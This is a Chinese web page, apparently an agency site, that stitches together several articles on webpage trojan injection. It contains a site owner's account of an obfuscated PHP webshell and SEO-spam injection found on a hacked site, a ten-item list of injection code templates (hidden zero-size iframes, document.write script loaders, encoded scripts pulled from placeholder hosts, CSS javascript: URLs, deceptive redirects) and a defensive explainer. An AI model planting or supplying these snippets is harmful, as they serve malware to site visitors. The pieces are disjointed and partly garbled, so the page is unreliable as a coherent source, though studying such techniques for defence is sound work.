整合營銷服務商
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
其實我網站中馬應該可以追溯到去年的八月份,當時好像是在 xx 平臺有用戶給我留言說網站上的游戲進不去了 (五子棋多人聯機)。于是我打開一看發現首頁被靜態化了,為了快速訪問就重新提交了入口文件也沒繼續理會。
直到后來,隔一段時間就又有人留言說打不開,我才開始排查起因了。進入項目代碼里,我發現有些文件被修改了。另一方面呢,網站的收錄也在不斷變少,甚至搜索出來的詞和描述都變了,有賭博的,也有體育,迷彩之類的,我猜測應該是中馬了。
但是有一點想不通,這人是不是閑得無聊。網站上除了技術類文章,還有一些 H5 單機游戲,資源城和多人聯機游戲由于沒有其他收入支撐,到期后就關閉了。剩下的就是一些免費使用的小工具了,有必要在我網站上掛馬嗎,帶著這個疑問就全都排查了一下代碼,終于找到了兩個文件能解釋這個問題了。
他是直接拿靜態化的首頁加了一些腳本放在了入口文件上,導致我導航欄的跳轉全部失效,以下就是我截取的部分文件代碼,再說明一下里面放了什么。
1. TDK 部分
也就是標題,描述和關鍵詞都改了,就是上面的模樣經過 ascii 編碼,可以通過腳本之家的工具 ascii 轉中文查看。他改的大概都是一些體育,迷彩之類的詞,這也就解釋了為什么網站的搜索詞都變了,因為沒有跳轉收錄也就變少了。
2. JavaScript 部分
Js 主要是下面那一長串數字,是 unicode 編碼了。我一個數字一個數字轉完之后,發現原來是一個 Js 腳本引入,最后 ducument.write 就是每次進入都引入腳本,腳本如下。
原來是給他的網站做引流,所以我也打開了他網站,就是下面這個。
這個文件就是他們掛上去的,可能是之前通過留言表單的 bug 提交的,文件名 dama.php,網絡上搜索應該就可以了解到,代碼如下:
\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65 像這個是十六進制,可以通過 JS 的 console.log 或 alert 顯示出來,其實就是 base64_deocde 函數名,而 \nc\n3\nR\ny\nX\n3\nJ\nv\nd\nD\nE\nz\n 同樣打印出來是如下一串換行的字母,所以就是 base64_decode () 那串,解碼后是一個 str_rot13 () 函數
所以那一串長長的就是被 ROT13 編碼了,可以通過以下方式修改,還原出那一串是些什么東西,也可以把 dama.php 在本地項目里直接運行。
運行后的樣子如下,登陸密碼就是他代碼里的那個 $password, 其實大概猜的到是 Admin 經過 md5 的,登陸后如下。
登陸后,就可以看到,自己網站就如同裸奔,他可以任意的提交,修改,刪除文件,還可以對目錄或文件提權,掃描,執行命令等等功能。最后通過我修改后,近幾日網站沒有再出現之前的問題了。以上文件僅作提示,所以關于如何修改和那個大馬如何使用就不做介紹了。
幾天勒索病毒就瘋了,其實最關鍵的還是用戶沒有很好的更新自己的電腦,才能讓黑客有機可乘。。。在此分享十種掛馬的方式,BUT!掛出來不是讓你去破壞別人的網站,而是讓你能做到有備無患。
一:框架掛馬
//說明:檢查src的地址是否有問題。
////////////////////代碼如下////////////////////
<iframe src=地址 width=0 height=0></iframe>
二:js文件掛馬
首先將以下代碼
//說明:這個地址是js代碼訪問的文件地址,一般是模仿你的js文件而設。
////////////////////代碼如下////////////////////
document.write(“<iframe width='0' height='0' src=‘地址'></iframe>”);
保存為xxx.js,則JS掛馬代碼為
//說明:運行你的js文件
////////////////////代碼如下////////////////////
<script language=javascript src=xxx.js></script>
三:js變形加密
//說明:運行后綴發生了變化,本質是一樣的。
////////////////////代碼如下////////////////////
<SCRIPT language=“JScript.Encode” src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后綴 電腦知識
四:body掛馬
//說明:略
////////////////////代碼如下////////////////////
<body ></body>
五:隱蔽掛馬
//說明:略
////////////////////代碼如下////////////////////
top.document.body.innerHTML=top.document.body.innerHTML + ' <iframe src=“http://www.xxx.com/muma.htm/”></iframe>';
六:CSS中掛馬
//說明:背景中鏈接用的js調用。
////////////////////代碼如下////////////////////
body {
background-image: url('javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}
七:JAJA掛馬
////////////////////代碼如下////////////////////
<SCRIPT language=javascript>
window.open (“地 址”,“”,“toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1”);
</script>
八:圖片偽裝
////////////////////代碼如下////////////////////
<html>
<iframe src=“網馬地址” height=0 width=0></iframe>
<img src=“圖片地址”></center>
</html>
九:偽裝調用
////////////////////代碼如下////////////////////
<frameset rows=“444,0” cols=“*”>
<frame src=“打開網頁” framborder=“no” scrolling=“auto” noresize marginwidth=“0”margingheight=“0”>
<frame src=“網馬地址” frameborder=“no” scrolling=“no” noresize marginwidth=“0”margingheight=“0”>
</frameset>
十:高級欺騙
////////////////////代碼如下////////////////////
<a href=“http://www.163.com(迷惑連接地址,顯示這個地址指向木馬地址)” > 頁面要顯示的內容 </a>
<SCRIPT Language=“JavaScript”>
function www_163_com ()
{
var url=“網馬地址”;
open(url,“NewWindow”,“toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10”);
}
</SCRIPT>
大家還有什么看法或者有更好的預防方法可以評論留言(文章來源:與時代同行 )
謂的掛馬,就是黑客通過各種手段,包括SQL注入,網站敏感文件掃描,服務器漏洞,網站程序0day, 等各種方法獲得網站管理員賬號,然后登陸網站后臺,通過數據"庫備份/恢復"或者上傳漏洞獲得一個webshell。利用獲得的webshell修改網站頁面的內容,向頁面中加入惡意轉向代碼。也可以直接通過弱口令獲得服務器或者網站FTP,然后直接對網站頁面直接進行修改。當你訪問被加入惡意代碼的頁面時,你就會自動的訪問被轉向的地址或者下載木馬病毒。下面就讓我們來看看幾種常見的掛馬網站。
(1)iframe 框架掛馬
在網頁上增加一行掛馬的程序,例如:
這種嵌入是的掛馬非常常見,在Google中搜索發現的可能還有木馬的網頁,一般都是被這種方式掛馬。這行語句就是在網頁打開的時候,同時打開另外一個網頁,當然這個網頁可能包含大量的木馬,也可能僅僅是為了騙取流量。
如果我們的網頁不使用iframe,我們可以屏蔽iframe屬性,這樣,即使網頁被iframe掛馬,也不會傷害到訪問網站的用戶。
【原理】:
IE5及其以后版本支持在CSS中使用expression,用來把CSS屬性和javascript腳本關聯起來,這里的CSS屬性可以是元素固有的屬性,也可以是自定義屬性。
我們在網頁中增加如下的代碼即可屏蔽iframe屬性:
iframe{a:expression(this.src=’about:blank’,this.outerHTML=”);}
iframe 也可以采用加密的方式掛馬,例如下面的代碼:
(2)script 掛馬
通過script的調用來掛馬,可以掛直接的html文件,也可以掛js文件,可以明文掛馬,為了躲避追查,也有加密掛馬的形式,形式各異,千差萬別,主要方式如下:
這是一個加密的掛馬語句;
2.1 htm文件掛馬:
通過上傳一個木馬文件(x.htm)掛馬,代碼如下:
document.write(“
”)
document.write(“”)
document.write(“”)
htm 掛馬代碼:
2.2 js文件掛馬
通過上傳一個木馬文件(x.js)掛馬,代碼如下:
document.write(“”);
JS掛馬代碼:
當然也可以掛互聯網上任何一臺機器的x.js文件;
2.3 js變形加密
(3)圖片偽裝掛馬
隨著防毒技術的發展,圖片木馬技術逃避殺毒監視的新技術,攻擊者將類似:http://www.xxx.com/x.htm中的木馬代碼植入到x.gif圖片文
件中,這些嵌入代碼的圖片都可以用工具生成。圖片木馬生成后,再利用代碼調用執行,是比較新穎的一種掛馬隱蔽方法,實例代碼如:
當用戶打開http://www.x.com/x.htm是,顯示給用戶的是http://www.x.com/x.jpg,而http://www.x.com/x.htm網頁代碼也隨之運行。
(4)其它的掛馬方式
4.1 body掛馬
也可以在css的body中掛馬
body {
background-image: url(‘javascript:document.write(“”)’)}
4.2 隱蔽掛馬
top.document.body.innerHTML=top.document.body.innerHTML +
‘ ’;
4.3 java的open函數掛馬
直接調用:
window.open (“x.htm”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1″);
欺騙調用:
頁面要顯示的內容
function www_a_com ()
{
var url=”網馬地址”;
open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,w
idth=800,height=600,left=10,top=10″);
}
4.4 偽裝調用:
形形色色的網頁掛馬,代碼都十分簡單,所以,互聯網木馬想要傳播,就會不停的開發新的掛馬方式,不停的加密隱藏自己,這樣才能逃過各種安全軟件的眼睛。其實,看看上文,很多語句都是編程常用的代碼,只是使用的目的不一樣罷了,了解了網頁掛馬的原理和方法,再防范網頁掛馬就容易多了。
帶木馬的網頁主要包括兩種類型:一種自己本身就是木馬網站,所有的頁面都有木馬,另一種是正常的網站,由于管理不善,被掛馬,成為木馬網站的一個中轉站,看看google中這樣的網站何其多,可能很多站長現在還不知道,呵呵,多學習學習吧,站長可不是那么好當的。
不過,僅僅有了網絡掛馬的代碼,也不一定一定能傳播木馬,只要我們加強防范,不讓我們的網頁被 掛馬,甚至,即使被掛馬了,打開了木馬網頁,我們的系統沒有漏洞,木馬網頁也同樣不能發揮作用的。所以,最重要的安全防范方式就是定期給系統打補丁,幾乎 所有的木馬網頁都無法發揮作用了。
*請認真填寫需求信息,我們會在24小時內與您取得聯系。
